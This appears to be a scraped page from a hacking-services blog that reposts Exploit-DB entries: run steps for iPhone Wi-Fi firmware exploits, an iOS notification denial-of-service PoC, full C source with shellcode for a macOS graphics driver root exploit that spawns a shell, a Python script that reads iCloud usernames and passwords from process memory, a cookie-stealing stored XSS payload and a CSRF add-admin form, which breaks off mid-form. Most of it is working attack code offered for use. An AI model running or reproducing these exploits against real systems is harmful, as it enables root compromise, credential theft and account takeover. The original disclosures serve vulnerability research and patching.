Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
The exploit achieves R/W access to the host's physical memory.
This exploit has been tested on the iPhone 7, iOS 10.2 (14C92). To run the exploit against different devices or versions, the symbols must be adjusted.
The attached archive contains the following directories:
-hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
instrumented to add various commands, allowing injection and reception of crafted action frames
used throughout the exploit.
-OneRing - The exploit itself.
To run the exploit, you must execute the following steps:
-Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
-Compile the provided version of hostapd
-Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
-Configure the following settings under "OneRing/rrm_exploit/conf.py":
-HOSTAPD_DIR - The directory of the hostapd binary compiled above
-TARGET_MAC - The MAC address of the device being exploited
-AP_MAC - The MAC address of your wireless dongle
-INTERFACE - The name of the wireless dongle's interface
-Configure the following settings under "OneRing/conf.py":
-TARGET_MAC - The MAC address of the device being exploited
-TARGET_IP - The IP address of the device being exploited
-Assemble the backdoor shellcode by running "OneRing/rrm_exploit/assemble_backdoor.sh"
-Assemble each of the code chunks under "OneRing/code_chunks" by running "compile.sh"
-Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
-Connect the target device to the network
-Run "OneRing/attack.py"
Following the steps above should result in DART's descriptor being mapped into IO-Space, allowing R/W access to the host's physical memory. You can utilise this R/W access by calling the "read_host_dword" and "write_host_dword" functions, respectively.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42996.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863111266
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
The exploit gains code execution on the Wi-Fi firmware on the iPhone 7.
The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 (14C92), but should work on all versions of iOS up to 10.3.3 (included). However, some symbols might need to be adjusted for different versions of iOS, see "exploit/symbols.py" for more information.
Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip).
The attached archive contains the following directories:
-hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
instrumented to add various commands, allowing injection and reception of crafted action frames
used throughout the exploit.
-exploit - The exploit itself.
To run the exploit, you must execute the following steps:
-Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
-Compile the provided version of hostapd
-Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
-Configure the following settings under "exploit/conf.py":
-HOSTAPD_DIR - The directory of the hostapd binary compiled above
-TARGET_MAC - The MAC address of the device being exploited
-AP_MAC - The MAC address of your wireless dongle
-INTERFACE - The name of the wireless dongle's interface
-Assemble the backdoor shellcode by running "exploit/assemble_backdoor.sh"
-Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
-Connect the target device to the network
-Run "exploit/attack.py"
Following the steps above should result in installation of a simple backdoor allowing read/write access to the firmware. You can interact with the backdoor to gain R/W access to the firmware by calling the "read_dword" and "write_dword" functions, respectively.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42784.zip
# Exploit Title: Apple iOS < 10.3.2 - Notifications API Denial of Service
# Date: 05-15-2017
# Exploit Author: Sem Voigtländer (@OxFEEDFACE), Vincent Desmurs (@vincedes3) and Joseph Shenton
# Vendor Homepage: https://apple.com
# Software Link: https://support.apple.com/en-us/HT207798
# Version: iOS 10.3.2
# Tested on: iOS 10.3.2 iPhone 6
# CVE : CVE-2017-6982
# We do not disclose a PoC for remote notifications.
# PoC for local notifications. (Objective-C).
defaults = [NSUserDefaults standardUserDefaults];
UIUserNotificationType types = UIUserNotificationTypeBadge | UIUserNotificationTypeSound | UIUserNotificationTypeAlert;
UIUserNotificationSettings *mySettings = [UIUserNotificationSettings settingsForTypes:types categories:nil];
[[UIApplication sharedApplication] registerUserNotificationSettings:mySettings];
//1
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
NSTimeInterval interval;
interval = 5; //Time here in second to respring
UILocalNotification* localNotification = [[UILocalNotification alloc] init];
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//2
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//3
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//4
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//5
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//6
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//7
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//8
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//9
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
//10
[defaults setBool:YES forKey:@"notificationIsActive"];
[defaults synchronize];
interval = 5;
localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval];
localNotification.alertBody = _crashtext.text;
localNotification.timeZone = [NSTimeZone defaultTimeZone];
localNotification.repeatInterval = NSCalendarUnitYear;
localNotification.soundName = UILocalNotificationDefaultSoundName;
[[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42014.zip
Sources:
https://github.com/doadam/ziVA
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
ziVA
An iOS kernel exploit designated to work on all 64-bit iOS devices <= 10.3.1
More general information
https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
Offsets modifications for other iOS devices
Like a lot (if not most) of the iOS kernel exploits, this also requires offsets for each iOS device and version. Those will be posted in the close future (when I get more time) but should be acquired from AppleAVEDriver (you can get a hint on the offsets from the comments above them).
Sandbox escape
Like mentioned, AppleAVEDriver direct access requires sandbox escape (either mediaserverd sandbox context or no sandbox at all). Fortunately, Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and a step towards a full jailbreak.
Is it a Jailbreak?
This is a crucial part in a Jailbreak chain, but this never aimed to become a Jailbreak.
Is this going to be a jailbreak?
Maybe, if someone wants to work on that
Credits
Credit for finding the vulnerabilities, chaining them together, writing the exploit go to Adam Donenfeld (@doadam). Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck).
Proof of Concept:
https://github.com/doadam/ziVA
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip
/*
░▀█▀░█▀█░█░░░█▀█░█▀▀░░░█░█░█░█░█░░░█▀█░█▀▄░█▀▀░█░█░
░░█░░█▀█░█░░░█░█░▀▀█░░░▀▄▀░█░█░█░░░█░█░█░█░█▀▀░▀▄▀░
░░▀░░▀░▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀░▀▀▀░▀░▀░▀▀░░▀▀▀░░▀░░
T A L O S V U L N D E V
Proof-of-Concept Exploit
Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/
Snort rules: 37517, 37518
CVE-2016-1743
Author: Piotr Bania, Cisco Talos
Target: Apple Intel HD 3000 Graphics driver
Impact: Local Privilege Escalation (root)
Tested Configuration:
Apple Intel HD 3000 Graphics driver 10.0.0
Darwin Kernel Version 15.2.0
OSX 10.11.2
Compilation:
gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
kudos:
qwertyoruiop (i've grabbed the lsym thing from you)
technical information (AppleIntelHD3000Graphics driver 10.0.0) :
...
__text:000000000001AA4E mov ecx, [rcx]
__text:000000000001AA50 add ecx, ecx
__text:000000000001AA52 sub eax, ecx
__text:000000000001AA54 cmp rbx, rax
__text:000000000001AA57 ja loc_1AC8C
__text:000000000001AA5D mov [rbp+var_54], esi
__text:000000000001AA60 mov rax, [rdi]
__text:000000000001AA63 mov esi, 168h
__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS #
Expected output:
mac-mini:bug mini$ uname -a
Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64
mac-mini:bug mini$ ./TALOS-2016-0088_poc
----------------------------------------------------------------
APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11
by Piotr Bania / CISCO TALOS
----------------------------------------------------------------
Alloc: deallocating!
Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes
Alloc: vm_allocate ok, now vm_protect ...
Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling
Mapping the kernel
MapKernel: kernel mapped
Initializing service
InitService: Trying: Gen6Accelerator
InitService: service ok!
Commencing stage 1
Stage1: Copying the stage1 payload 0x00001000 - 0x00001071
Stage1: Setting up the RIP to 0x00001000
Stage1: Copying trigger data
Stage1: Making stage1 call
Stage1: leaked kernel address 0xffffff8021e00000
Stage1: kernel address leaked, success!
ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000)
ResolveApi: _current_proc = 0xffffff8022437a60
ResolveApi: _proc_ucred = 0xffffff80223a9af0
ResolveApi: _posix_cred_get = 0xffffff802237e780
ResolveApi: _chgproccnt = 0xffffff80223a8400
Commencing stage 2
Stage2: preparing the stage2 payload
Stage2: Copying the stage2 payload 0x00001000 - 0x00001071
Stage2: Setting up the RIP to 0x00001000
Stage2: Copying trigger data
Stage2: Making stage2 call
Stage2: success, got root!
Stage2: now executing shell
sh-3.2# whoami
root
sh-3.2#
*/
#include "import.h"
/**
defines
**/
#define MEM_SIZE 0x2000
#define PAYLOAD_MEM_START 0x1000
#define INIT_SIG 0x0210010100000008
#define OFFSET_PAYLOAD_EXEC 0x980
#define OFFSET_ROOM 64
#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr
/**
stage 1 payload - get kernel address and put it to 0x1000
; memory space for kernel address
nop
nop
nop
nop
nop
nop
nop
nop
save_regs64
; get msr entry
mov rcx, 0C0000082h ; lstar
rdmsr ; MSR[ecx] --> edx:eax
shl rdx, 32
or rax, rdx
; find kernel addr - scan backwards
MAX_KERNEL_SCAN_SIZE equ 10000h
KERNEL_SIG equ 01000007FEEDFACFh
PAGE_SIZE equ 1000h
mov rcx, MAX_KERNEL_SCAN_SIZE
and rax, not 0FFFFFh
xor rdx, rdx
mov r8, KERNEL_SIG
scan_loop:
sub rax, PAGE_SIZE
dec rcx
jz scan_done
; is sig correct?
cmp qword [rax], r8
jnz scan_loop
mov rdx, rax
scan_done:
; store the addr - rdx kernel addr, 0 if not found
lea rcx, [shell_start]
mov qword [rcx], rdx
load_regs64
xor rax, rax
xor r15, r15
ret
**/
unsigned char stage1[113] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55,
0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32,
0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25,
0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00,
0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75,
0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F,
0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF,
0xC3
};
/**
stage 2 payload - escalate
jmp over_api_table
api_current_proc dq 0
api_proc_ucred dq 0
api_posix_cred_get dq 0
api_chgproccnt dq 0
over_api_table:
save_regs64
mov rax, qword [api_current_proc]
call rax
mov rdi, rax ; rdi = cur_proc
; system v abi - rdi first arg
mov rax, qword [api_proc_ucred]
call rax
; rax = cur_ucred
mov rdi, rax
mov rax, qword [api_posix_cred_get]
call rax
; rax = pcred
mov dword [rax], 0
mov dword [rax+8], 0
load_regs64
xor rax, rax
xor r15, r15
ret
**/
#define OFF_API_START 2
#define OFF_API_CURRENT_PROC OFF_API_START
#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8
#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8
#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example
unsigned char stage2[111] = {
0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF,
0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7,
0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E,
0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3
};
/**
globals
**/
uint64_t mem;
io_connect_t conn;
uint64_t KernelAddr = 0;
lsym_map_t* MappingKernel = 0;
uint64_t api_current_proc = 0;
uint64_t api_proc_ucred = 0;
uint64_t api_posix_cred_get = 0;
uint64_t api_chgproccnt = 0;
/**
functions
**/
uint64_t Alloc(uint32_t addr, uint32_t sz)
{
mach_error_t k_error;
printf("Alloc: deallocating! \n");
vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz);
k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate ok, now vm_protect ...\n");
k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr);
while(sz--) *(char*)(addr+sz)=0;
return addr;
}
int MapKernel(void)
{
MappingKernel = lsym_map_file("/mach_kernel");
if (!MappingKernel || !MappingKernel->map)
{
MappingKernel = lsym_map_file("/System/Library/Kernels/kernel");
}
if (!MappingKernel || !MappingKernel->map)
{
printf("MapKernel: unable to map kernel, quiting \n");
return -1;
}
printf("MapKernel: kernel mapped \n");
return 1;
}
int ResolveApi(void)
{
uint64_t base = lsym_kernel_base(MappingKernel);
api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc");
api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred");
api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get");
api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt");
printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base);
printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc);
printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred);
printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get);
printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt);
return 1;
}
int InitService(char *IoServiceName)
{
int type;
io_service_t service;
CFMutableDictionaryRef matching;
io_iterator_t iterator;
printf("InitService: Trying: %s \n", IoServiceName);
matching = IOServiceMatching(IoServiceName);
if( !matching)
{
printf("Initservice: IOServiceMatching() failed \n");
return -1;
}
if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS)
{
printf("InitService: IOServiceGetMatchingServices failed \n");
return -1;
}
service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL)
{
printf("InitService: IOIteratorNext failed \n");
return -1;
}
type = 0;
conn = MACH_PORT_NULL;
if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS)
{
printf("InitService: IOServiceOpen failed! \n");
return -1;
}
printf("InitService: service ok! \n");
return 1;
}
int Stage1(void)
{
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1));
printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage1: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage1: Making stage1 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
KernelAddr = *(uint64_t*)PAYLOAD_MEM_START;
printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr);
if ((KernelAddr == 0) || (KernelAddr == 0x90909090))
{
printf("Stage1: fatal kernel address is wrong, exiting \n");
return -1;
}
printf("Stage1: kernel address leaked, success! \n");
return 1;
}
int Stage2(void)
{
int i;
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage2: preparing the stage2 payload \n");
unsigned char *t = (unsigned char*)&stage2;
*(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
*(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
*(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
*(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage2: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage2: Making stage2 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
setuid(0);
if (getuid() == 0)
{
printf("Stage2: success, got root! \n");
printf("Stage2: now executing shell \n");
system("/bin/sh");
exit(0);
}
printf("Stage2: failed! \n");
return -1;
}
int main(void)
{
printf(" ---------------------------------------------------------------- \n");
printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
printf(" by Piotr Bania / CISCO TALOS \n");
printf(" ---------------------------------------------------------------- \n\n\n");
IOServiceClose(0);
IOServiceOpen(0, 0, 0, 0);
// if this fails and we are done
mem = Alloc(0, MEM_SIZE);
printf("Mapping the kernel \n");
if (MapKernel() == -1)
return -1;
printf("Initializing service \n");
if (InitService("Gen6Accelerator") == -1)
return -1;
printf("Commencing stage 1 \n");
if (Stage1() == -1)
return -1;
if (ResolveApi() == -1)
return -1;
printf("Commencing stage 2 \n");
Stage2();
return 1;
}
The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method [ETTapMessage initWithArchiveData:] checks that the points array is twice as long as the deltas array, but only checks that the colors array is longer than eight bytes, even though a color is needed for every point-delta pair that is processed.
To reproduce the issue with the files in tapcrash.zip:
1) install frida (pip3 install frida)
2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
3) in injectMessage.js replace the marker "FULL PATH" with the path of the obj file
4) in the local directory, run:
python3 sendMessage.py
This will lead to a crash in SpringBoard requiring no user interaction.
I've also attached a crash dump and ETencode.m, which is the file that was used to generate the obj file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47158.zip
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-
*-* Vulnerable link : http://site_name/path/index.php?page=pages&pid=
*-* Stored XSS Payload ( Comments ):
# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
# Payload : <svg/onload=prompt(7);//>
############ POST DATA ############
task=publish_comment &
comment_id=
& article_id=13
&user_id=
&token=212529c97855409e56c0e333721461df
&comment_user_name=<svg/onload=prompt(document.cookie);//>
&comment_user_email=meryem@yopmai.com
&comment_text=skdLSJDLKSDKJ
&captcha_code=w7AG
&btnSubmitPC=Publish your comment
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin (Main))
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
*-* Vulnerable link : http://site_name/path/index.php?admin=admins_management
############ CSRF PoC #############
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/index.php?admin=admins_management" method="POST" enctype="multipart/form-data">
<input type="hidden" name="mg_prefix" value=" " />
<input type="hidden" name="mg_action" value="create" />
<input type="hidden" name="mg_rid" value="-1" />
<input type="hidden" name="mg_sorting_fields" value=" " />
<input type="hidden" name="mg_sorting_types" value=" " />
<input type="hidden" name="mg_page" value="1" />
<input type="hidden" name="mg_operation" value=" " />
